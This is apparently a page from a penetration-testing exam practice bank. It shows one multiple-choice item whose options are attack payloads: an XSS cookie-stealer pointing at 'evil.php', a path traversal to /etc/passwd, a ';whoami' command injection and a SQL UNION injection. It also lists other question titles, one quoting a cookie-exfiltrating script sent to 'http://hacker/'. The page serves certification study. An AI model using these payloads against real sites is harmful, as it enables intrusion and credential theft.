Multiple Choice
A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?
A) <script>var adr= '../evil.php?test=' + escape(document.cookie) ;</script>
B) ../../../../../../../../../../etc/passwd
C) /var/www/html/index.php;whoami
D) 1 UNION SELECT 1, DATABASE() ,3--
Correct Answer:
Verified
Correct Answer:
Verified
Q54: A large client wants a penetration tester
Q55: A penetration tester wants to identify CVEs
Q56: The results of an Nmap scan are
Q57: A company conducted a simulated phishing attack
Q58: Appending string values onto another string is
Q60: A penetration tester who is conducting a
Q61: An assessment has been completed, and all
Q62: A company becomes concerned when the security
Q63: Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of
Q64: Which of the following is the MOST